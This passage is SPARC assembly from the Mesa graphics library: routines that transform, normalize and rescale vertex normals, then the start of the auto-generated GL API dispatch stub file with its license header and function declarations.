fmuls M2, %f15, M2
fmuls M4, %f15, M4
fmuls M5, %f15, M5
fmuls M6, %f15, M6
fmuls M8, %f15, M8
fmuls M9, %f15, M9
fmuls M10, %f15, M10
5:
ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0) + (uy * m1) + (uz * m2)
* ty (f5) = (ux * m4) + (uy * m5) + (uz * m6)
* tz (f7) = (ux * m8) + (uy * m9) + (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M1, %f4 ! FGM Group
fmuls %f0, M4, %f5 ! FGM Group
fmuls %f1, M5, %f6 ! FGM Group
fmuls %f0, M8, %f7 ! FGM Group f3 available
fmuls %f1, M9, %f8 ! FGM Group f4 available
fadds %f3, %f4, %f3 ! FGA
fmuls %f2, M2, %f10 ! FGM Group f5 available
fmuls %f2, M6, %f0 ! FGM Group f6 available
fadds %f5, %f6, %f5 ! FGA
fmuls %f2, M10, %f4 ! FGM Group f7 available
fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
fadds %f3, %f10, %f3 ! FGA Group f10 available
ld [%o3], %f13 ! LSU
fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
add %o3, 4, %o3 ! IEU0
fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */
fmuls %f3, %f13, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
fmuls %f5, %f13, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
fmuls %f7, %f13, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * len
cmp %o4, %g1 ! continue if (i < count)
bl 5b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_transform_normalize_normals_no_rot
_mesa_sparc_transform_normalize_normals_no_rot:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sethi %hi(ONE_DOT_ZERO), %g2
sub %sp, 16, %sp
st %g2, [%sp + STACK_VAR_OFF+0x0]
st %o1, [%sp + STACK_VAR_OFF+0x4]
ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
ld [%sp + STACK_VAR_OFF+0x4], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_5_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
cmp %o3, 0
bne 4f
clr %o4 ! 'i' for STRIDE_LOOP
1: /* LENGTHS == NULL */
ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0)
* ty (f5) = (uy * m5)
* tz (f7) = (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M5, %f5 ! FGM Group
fmuls %f2, M10, %f7 ! FGM Group
/* f3=tx, f5=ty, f7=tz */
/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
fmuls %f3, %f3, %f6 ! FGM Group stall, f3 available
fmuls %f5, %f5, %f8 ! FGM Group f5 available
fmuls %f7, %f7, %f10 ! FGM Group f7 available
fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available
/* scale (f6) = 1.0 / sqrt(len) */
fsqrts %f6, %f6 ! FDIV 20 cycles
fdivs %f12, %f6, %f6 ! FDIV 14 cycles
fmuls %f3, %f6, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f6, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f6, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
ba 7f
nop
4: /* LENGTHS != NULL */
fmuls M0, %f15, M0
fmuls M5, %f15, M5
fmuls M10, %f15, M10
5:
ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0)
* ty (f5) = (uy * m5)
* tz (f7) = (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
ld [%o3], %f13 ! LSU
fmuls %f1, M5, %f5 ! FGM Group
add %o3, 4, %o3 ! IEU0
fmuls %f2, M10, %f7 ! FGM Group
/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */
fmuls %f3, %f13, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
fmuls %f5, %f13, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
fmuls %f7, %f13, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * len
cmp %o4, %g1 ! continue if (i < count)
bl 5b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_transform_rescale_normals_no_rot
_mesa_sparc_transform_rescale_normals_no_rot:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sub %sp, 16, %sp
st %o1, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_5_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
clr %o4 ! 'i' for STRIDE_LOOP
fmuls M0, %f15, M0
fmuls M5, %f15, M5
fmuls M10, %f15, M10
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0)
* ty (f5) = (uy * m5)
* tz (f7) = (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
st %f3, [%g3 + 0x00] ! LSU
fmuls %f1, M5, %f5 ! FGM Group
st %f5, [%g3 + 0x04] ! LSU
fmuls %f2, M10, %f7 ! FGM Group
st %f7, [%g3 + 0x08] ! LSU
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_transform_rescale_normals
_mesa_sparc_transform_rescale_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sub %sp, 16, %sp
st %o1, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_1_2_4_5_6_8_9_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
clr %o4 ! 'i' for STRIDE_LOOP
fmuls M0, %f15, M0
fmuls M1, %f15, M1
fmuls M2, %f15, M2
fmuls M4, %f15, M4
fmuls M5, %f15, M5
fmuls M6, %f15, M6
fmuls M8, %f15, M8
fmuls M9, %f15, M9
fmuls M10, %f15, M10
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M1, %f4 ! FGM Group
fmuls %f0, M4, %f5 ! FGM Group
fmuls %f1, M5, %f6 ! FGM Group
fmuls %f0, M8, %f7 ! FGM Group f3 available
fmuls %f1, M9, %f8 ! FGM Group f4 available
fadds %f3, %f4, %f3 ! FGA
fmuls %f2, M2, %f10 ! FGM Group f5 available
fmuls %f2, M6, %f0 ! FGM Group f6 available
fadds %f5, %f6, %f5 ! FGA
fmuls %f2, M10, %f4 ! FGM Group f7 available
fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
fadds %f3, %f10, %f3 ! FGA Group f10 available
st %f3, [%g3 + 0x00] ! LSU
fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
st %f5, [%g3 + 0x04] ! LSU
fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
st %f7, [%g3 + 0x08] ! LSU
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_transform_normals_no_rot
_mesa_sparc_transform_normals_no_rot:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_5_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
clr %o4 ! 'i' for STRIDE_LOOP
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0)
* ty (f5) = (uy * m5)
* tz (f7) = (uz * m10)
*/
fmuls %f0, M0, %f3 ! FGM Group
st %f3, [%g3 + 0x00] ! LSU
fmuls %f1, M5, %f5 ! FGM Group
st %f5, [%g3 + 0x04] ! LSU
fmuls %f2, M10, %f7 ! FGM Group
st %f7, [%g3 + 0x08] ! LSU
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_transform_normals
_mesa_sparc_transform_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_1_2_4_5_6_8_9_10(%o0)
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
clr %o4 ! 'i' for STRIDE_LOOP
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M1, %f4 ! FGM Group
fmuls %f0, M4, %f5 ! FGM Group
fmuls %f1, M5, %f6 ! FGM Group
fmuls %f0, M8, %f7 ! FGM Group f3 available
fmuls %f1, M9, %f8 ! FGM Group f4 available
fadds %f3, %f4, %f3 ! FGA
fmuls %f2, M2, %f10 ! FGM Group f5 available
fmuls %f2, M6, %f0 ! FGM Group f6 available
fadds %f5, %f6, %f5 ! FGA
fmuls %f2, M10, %f4 ! FGM Group f7 available
fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
fadds %f3, %f10, %f3 ! FGA Group f10 available
st %f3, [%g3 + 0x00] ! LSU
fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
st %f5, [%g3 + 0x04] ! LSU
fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
st %f7, [%g3 + 0x08] ! LSU
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_normalize_normals
_mesa_sparc_normalize_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sethi %hi(ONE_DOT_ZERO), %g2
sub %sp, 16, %sp
st %g2, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
add %sp, 16, %sp
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
cmp %o3, 0
bne 4f
clr %o4 ! 'i' for STRIDE_LOOP
1: /* LENGTHS == NULL */
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* f3=tx, f5=ty, f7=tz */
/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
fmuls %f3, %f3, %f6 ! FGM Group f3 available
fmuls %f5, %f5, %f8 ! FGM Group f5 available
fmuls %f7, %f7, %f10 ! FGM Group f7 available
fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available
/* scale (f6) = 1.0 / sqrt(len) */
fsqrts %f6, %f6 ! FDIV 20 cycles
fdivs %f12, %f6, %f6 ! FDIV 14 cycles
fmuls %f3, %f6, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f6, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f6, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
ba 7f
nop
4: /* LENGTHS != NULL */
5:
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
ld [%o3], %f13 ! LSU
add %o3, 4, %o3 ! IEU0
/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */
fmuls %f3, %f13, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
fmuls %f5, %f13, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
fmuls %f7, %f13, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * len
cmp %o4, %g1 ! continue if (i < count)
bl 5b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
.globl _mesa_sparc_rescale_normals
_mesa_sparc_rescale_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
sethi %hi(ONE_DOT_ZERO), %g2
sub %sp, 16, %sp
st %o1, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f
clr %o4 ! 'i' for STRIDE_LOOP
1:
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* f3=tx, f5=ty, f7=tz */
fmuls %f3, %f15, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f15, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f15, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! advance out vector pointer
7: retl
nop
|
AIFM-sys/AIFM
| 117,066
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/glapi_sparc.S
|
/* DO NOT EDIT - This file generated automatically by gl_SPARC_asm.py (from Mesa) script */
/*
* Copyright (C) 1999-2003 Brian Paul All Rights Reserved.
* (C) Copyright IBM Corporation 2004
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL, IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include "glapioffsets.h"
#ifdef __arch64__
# define GL_STUB(fn,off) \
fn: \
sethi %hi(0xDEADBEEF), %g4 ; \
sethi %hi(0xDEADBEEF), %g1 ; \
or %g4, %lo(0xDEADBEEF), %g4 ; \
or %g1, %lo(0xDEADBEEF), %g1 ; \
sllx %g4, 32, %g4 ; \
ldx [%g1 + %g4], %g1 ; \
sethi %hi(8 * off), %g4 ; \
or %g4, %lo(8 * off), %g4 ; \
ldx [%g1 + %g4], %g5 ; \
jmpl %g5, %g0 ; \
nop
#else
# define GL_STUB(fn,off) \
fn: \
sethi %hi(0xDEADBEEF), %g1 ; \
ld [%g1 + %lo(0xDEADBEEF)], %g1 ; \
ld [%g1 + (4 * off)], %g5 ; \
jmpl %g5, %g0 ; \
nop
#endif
#define GL_STUB_ALIAS(fn,alias) fn = alias
.text
.align 32
.globl __glapi_sparc_icache_flush ; .type __glapi_sparc_icache_flush,#function
__glapi_sparc_icache_flush: /* %o0 = insn_addr */
flush %o0
retl
nop
.data
.align 64
.globl glNewList ; .type glNewList,#function
.globl glEndList ; .type glEndList,#function
.globl glCallList ; .type glCallList,#function
.globl glCallLists ; .type glCallLists,#function
.globl glDeleteLists ; .type glDeleteLists,#function
.globl glGenLists ; .type glGenLists,#function
.globl glListBase ; .type glListBase,#function
.globl glBegin ; .type glBegin,#function
.globl glBitmap ; .type glBitmap,#function
.globl glColor3b ; .type glColor3b,#function
.globl glColor3bv ; .type glColor3bv,#function
.globl glColor3d ; .type glColor3d,#function
.globl glColor3dv ; .type glColor3dv,#function
.globl glColor3f ; .type glColor3f,#function
.globl glColor3fv ; .type glColor3fv,#function
.globl glColor3i ; .type glColor3i,#function
.globl glColor3iv ; .type glColor3iv,#function
.globl glColor3s ; .type glColor3s,#function
.globl glColor3sv ; .type glColor3sv,#function
.globl glColor3ub ; .type glColor3ub,#function
.globl glColor3ubv ; .type glColor3ubv,#function
.globl glColor3ui ; .type glColor3ui,#function
.globl glColor3uiv ; .type glColor3uiv,#function
.globl glColor3us ; .type glColor3us,#function
.globl glColor3usv ; .type glColor3usv,#function
.globl glColor4b ; .type glColor4b,#function
.globl glColor4bv ; .type glColor4bv,#function
.globl glColor4d ; .type glColor4d,#function
.globl glColor4dv ; .type glColor4dv,#function
.globl glColor4f ; .type glColor4f,#function
.globl glColor4fv ; .type glColor4fv,#function
.globl glColor4i ; .type glColor4i,#function
.globl glColor4iv ; .type glColor4iv,#function
.globl glColor4s ; .type glColor4s,#function
.globl glColor4sv ; .type glColor4sv,#function
.globl glColor4ub ; .type glColor4ub,#function
.globl glColor4ubv ; .type glColor4ubv,#function
.globl glColor4ui ; .type glColor4ui,#function
.globl glColor4uiv ; .type glColor4uiv,#function
.globl glColor4us ; .type glColor4us,#function
.globl glColor4usv ; .type glColor4usv,#function
.globl glEdgeFlag ; .type glEdgeFlag,#function
.globl glEdgeFlagv ; .type glEdgeFlagv,#function
.globl glEnd ; .type glEnd,#function
.globl glIndexd ; .type glIndexd,#function
.globl glIndexdv ; .type glIndexdv,#function
.globl glIndexf ; .type glIndexf,#function
.globl glIndexfv ; .type glIndexfv,#function
.globl glIndexi ; .type glIndexi,#function
.globl glIndexiv ; .type glIndexiv,#function
.globl glIndexs ; .type glIndexs,#function
.globl glIndexsv ; .type glIndexsv,#function
.globl glNormal3b ; .type glNormal3b,#function
.globl glNormal3bv ; .type glNormal3bv,#function
.globl glNormal3d ; .type glNormal3d,#function
.globl glNormal3dv ; .type glNormal3dv,#function
.globl glNormal3f ; .type glNormal3f,#function
.globl glNormal3fv ; .type glNormal3fv,#function
.globl glNormal3i ; .type glNormal3i,#function
.globl glNormal3iv ; .type glNormal3iv,#function
.globl glNormal3s ; .type glNormal3s,#function
.globl glNormal3sv ; .type glNormal3sv,#function
.globl glRasterPos2d ; .type glRasterPos2d,#function
.globl glRasterPos2dv ; .type glRasterPos2dv,#function
.globl glRasterPos2f ; .type glRasterPos2f,#function
.globl glRasterPos2fv ; .type glRasterPos2fv,#function
.globl glRasterPos2i ; .type glRasterPos2i,#function
.globl glRasterPos2iv ; .type glRasterPos2iv,#function
.globl glRasterPos2s ; .type glRasterPos2s,#function
.globl glRasterPos2sv ; .type glRasterPos2sv,#function
.globl glRasterPos3d ; .type glRasterPos3d,#function
.globl glRasterPos3dv ; .type glRasterPos3dv,#function
.globl glRasterPos3f ; .type glRasterPos3f,#function
.globl glRasterPos3fv ; .type glRasterPos3fv,#function
.globl glRasterPos3i ; .type glRasterPos3i,#function
.globl glRasterPos3iv ; .type glRasterPos3iv,#function
.globl glRasterPos3s ; .type glRasterPos3s,#function
.globl glRasterPos3sv ; .type glRasterPos3sv,#function
.globl glRasterPos4d ; .type glRasterPos4d,#function
.globl glRasterPos4dv ; .type glRasterPos4dv,#function
.globl glRasterPos4f ; .type glRasterPos4f,#function
.globl glRasterPos4fv ; .type glRasterPos4fv,#function
.globl glRasterPos4i ; .type glRasterPos4i,#function
.globl glRasterPos4iv ; .type glRasterPos4iv,#function
.globl glRasterPos4s ; .type glRasterPos4s,#function
.globl glRasterPos4sv ; .type glRasterPos4sv,#function
.globl glRectd ; .type glRectd,#function
.globl glRectdv ; .type glRectdv,#function
.globl glRectf ; .type glRectf,#function
.globl glRectfv ; .type glRectfv,#function
.globl glRecti ; .type glRecti,#function
.globl glRectiv ; .type glRectiv,#function
.globl glRects ; .type glRects,#function
.globl glRectsv ; .type glRectsv,#function
.globl glTexCoord1d ; .type glTexCoord1d,#function
.globl glTexCoord1dv ; .type glTexCoord1dv,#function
.globl glTexCoord1f ; .type glTexCoord1f,#function
.globl glTexCoord1fv ; .type glTexCoord1fv,#function
.globl glTexCoord1i ; .type glTexCoord1i,#function
.globl glTexCoord1iv ; .type glTexCoord1iv,#function
.globl glTexCoord1s ; .type glTexCoord1s,#function
.globl glTexCoord1sv ; .type glTexCoord1sv,#function
.globl glTexCoord2d ; .type glTexCoord2d,#function
.globl glTexCoord2dv ; .type glTexCoord2dv,#function
.globl glTexCoord2f ; .type glTexCoord2f,#function
.globl glTexCoord2fv ; .type glTexCoord2fv,#function
.globl glTexCoord2i ; .type glTexCoord2i,#function
.globl glTexCoord2iv ; .type glTexCoord2iv,#function
.globl glTexCoord2s ; .type glTexCoord2s,#function
.globl glTexCoord2sv ; .type glTexCoord2sv,#function
.globl glTexCoord3d ; .type glTexCoord3d,#function
.globl glTexCoord3dv ; .type glTexCoord3dv,#function
.globl glTexCoord3f ; .type glTexCoord3f,#function
.globl glTexCoord3fv ; .type glTexCoord3fv,#function
.globl glTexCoord3i ; .type glTexCoord3i,#function
.globl glTexCoord3iv ; .type glTexCoord3iv,#function
.globl glTexCoord3s ; .type glTexCoord3s,#function
.globl glTexCoord3sv ; .type glTexCoord3sv,#function
.globl glTexCoord4d ; .type glTexCoord4d,#function
.globl glTexCoord4dv ; .type glTexCoord4dv,#function
.globl glTexCoord4f ; .type glTexCoord4f,#function
.globl glTexCoord4fv ; .type glTexCoord4fv,#function
.globl glTexCoord4i ; .type glTexCoord4i,#function
.globl glTexCoord4iv ; .type glTexCoord4iv,#function
.globl glTexCoord4s ; .type glTexCoord4s,#function
.globl glTexCoord4sv ; .type glTexCoord4sv,#function
.globl glVertex2d ; .type glVertex2d,#function
.globl glVertex2dv ; .type glVertex2dv,#function
.globl glVertex2f ; .type glVertex2f,#function
.globl glVertex2fv ; .type glVertex2fv,#function
.globl glVertex2i ; .type glVertex2i,#function
.globl glVertex2iv ; .type glVertex2iv,#function
.globl glVertex2s ; .type glVertex2s,#function
.globl glVertex2sv ; .type glVertex2sv,#function
.globl glVertex3d ; .type glVertex3d,#function
.globl glVertex3dv ; .type glVertex3dv,#function
.globl glVertex3f ; .type glVertex3f,#function
.globl glVertex3fv ; .type glVertex3fv,#function
.globl glVertex3i ; .type glVertex3i,#function
.globl glVertex3iv ; .type glVertex3iv,#function
.globl glVertex3s ; .type glVertex3s,#function
.globl glVertex3sv ; .type glVertex3sv,#function
.globl glVertex4d ; .type glVertex4d,#function
.globl glVertex4dv ; .type glVertex4dv,#function
.globl glVertex4f ; .type glVertex4f,#function
.globl glVertex4fv ; .type glVertex4fv,#function
.globl glVertex4i ; .type glVertex4i,#function
.globl glVertex4iv ; .type glVertex4iv,#function
.globl glVertex4s ; .type glVertex4s,#function
.globl glVertex4sv ; .type glVertex4sv,#function
.globl glClipPlane ; .type glClipPlane,#function
.globl glColorMaterial ; .type glColorMaterial,#function
.globl glCullFace ; .type glCullFace,#function
.globl glFogf ; .type glFogf,#function
.globl glFogfv ; .type glFogfv,#function
.globl glFogi ; .type glFogi,#function
.globl glFogiv ; .type glFogiv,#function
.globl glFrontFace ; .type glFrontFace,#function
.globl glHint ; .type glHint,#function
.globl glLightf ; .type glLightf,#function
.globl glLightfv ; .type glLightfv,#function
.globl glLighti ; .type glLighti,#function
.globl glLightiv ; .type glLightiv,#function
.globl glLightModelf ; .type glLightModelf,#function
.globl glLightModelfv ; .type glLightModelfv,#function
.globl glLightModeli ; .type glLightModeli,#function
.globl glLightModeliv ; .type glLightModeliv,#function
.globl glLineStipple ; .type glLineStipple,#function
.globl glLineWidth ; .type glLineWidth,#function
.globl glMaterialf ; .type glMaterialf,#function
.globl glMaterialfv ; .type glMaterialfv,#function
.globl glMateriali ; .type glMateriali,#function
.globl glMaterialiv ; .type glMaterialiv,#function
.globl glPointSize ; .type glPointSize,#function
.globl glPolygonMode ; .type glPolygonMode,#function
.globl glPolygonStipple ; .type glPolygonStipple,#function
.globl glScissor ; .type glScissor,#function
.globl glShadeModel ; .type glShadeModel,#function
.globl glTexParameterf ; .type glTexParameterf,#function
.globl glTexParameterfv ; .type glTexParameterfv,#function
.globl glTexParameteri ; .type glTexParameteri,#function
.globl glTexParameteriv ; .type glTexParameteriv,#function
.globl glTexImage1D ; .type glTexImage1D,#function
.globl glTexImage2D ; .type glTexImage2D,#function
.globl glTexEnvf ; .type glTexEnvf,#function
.globl glTexEnvfv ; .type glTexEnvfv,#function
.globl glTexEnvi ; .type glTexEnvi,#function
.globl glTexEnviv ; .type glTexEnviv,#function
.globl glTexGend ; .type glTexGend,#function
.globl glTexGendv ; .type glTexGendv,#function
.globl glTexGenf ; .type glTexGenf,#function
.globl glTexGenfv ; .type glTexGenfv,#function
.globl glTexGeni ; .type glTexGeni,#function
.globl glTexGeniv ; .type glTexGeniv,#function
.globl glFeedbackBuffer ; .type glFeedbackBuffer,#function
.globl glSelectBuffer ; .type glSelectBuffer,#function
.globl glRenderMode ; .type glRenderMode,#function
.globl glInitNames ; .type glInitNames,#function
.globl glLoadName ; .type glLoadName,#function
.globl glPassThrough ; .type glPassThrough,#function
.globl glPopName ; .type glPopName,#function
.globl glPushName ; .type glPushName,#function
.globl glDrawBuffer ; .type glDrawBuffer,#function
.globl glClear ; .type glClear,#function
.globl glClearAccum ; .type glClearAccum,#function
